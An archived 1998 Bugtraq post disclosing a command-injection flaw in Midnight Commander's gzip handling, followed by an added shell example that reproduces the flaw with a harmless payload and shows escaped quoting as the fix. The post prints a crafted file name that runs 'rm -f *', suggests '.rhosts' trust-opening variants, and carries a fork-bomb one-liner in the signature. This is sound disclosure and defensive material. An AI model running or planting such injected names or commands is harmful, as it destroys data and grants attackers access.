Bugtraq mailing list archives
MC shell scripts
From: lcamtuf () POLBOX COM (Michał Zalewski)
Date: Sat, 17 Jan 1998 22:14:45 +0100
I discovered a problem with Midnight Commander's method of decompressing archives, which allows execution of hidden commands. An evil file may be prepared this way:

  $ gzip foo
  $ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"

Now, this filename, when displayed by user-friendly programs (www or ftp browsers, file managers), will be cropped to fit in a window :) Under my mc (vidmode 11) it's displayed as:

  quake2-test-unknown-linu~-i386-generic-beta.gz

(or .tgz, your choice :)

When I'm viewing or editing a .gz archive (F3/F4/ENTER), Midnight Commander calls gzip from a shell script created in /tmp:

  gzip -dc 'filename' 2>/dev/null

That may be dangerous. In the above case, this script is equal to:

  gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
  rm -f *

'rm -f *' may be replaced with 'echo + +>.rhosts', 'touch WHOS_THE_WINNER' etc ;)

Of course, it isn't a serious problem for experienced users, but what's with the non-experienced ones (80%) ;-)

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
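
Added example, not part of the original post and not Midnight Commander's code: the quoting problem described in the message, with the unescaped script line beside an escaped one. The function names, the scratch-directory check and the SAMPLE file name (which carries a harmless "touch MARKER") are assumptions constructed for this illustration.

```shell
#!/bin/sh
# Added example; function names and SAMPLE are hypothetical/constructed.

# Quote a string as one sh word: wrap it in single quotes and rewrite each
# embedded ' as '\''. The trailing "x" keeps $(...) from eating newlines.
sh_quote() {
    q=$(printf '%sx' "$1" | sed "s/'/'\\\\''/g")
    printf "'%s'" "${q%x}"
}

# The script line described in the post: name pasted between quotes as-is.
build_naive() {
    printf "gzip -dc '%s' 2>/dev/null\n" "$1"
}

# Same line with the name escaped; "--" also stops names starting with "-"
# from being read as gzip options.
build_quoted() {
    printf 'gzip -dc -- %s 2>/dev/null\n' "$(sh_quote "$1")"
}

# Run a generated script in a scratch directory; succeed only if the command
# hidden in the file name ran (it would create a file called MARKER there).
marker_created() {
    dir=$(mktemp -d) || return 2
    ( cd "$dir" && printf '%s' "$1" | sh >/dev/null 2>&1 ) || :
    if [ -e "$dir/MARKER" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return "$rc"
}

# Constructed name in the shape shown in the post, with a harmless payload.
SAMPLE="demo-'\`touch MARKER\`'-beta.gz"

build_naive "$SAMPLE"    # quotes close early, backticks are live
build_quoted "$SAMPLE"   # whole name stays one literal word
```

Passing the file name to gzip as an argument from the calling program, without generating a shell script at all, avoids the quoting step entirely.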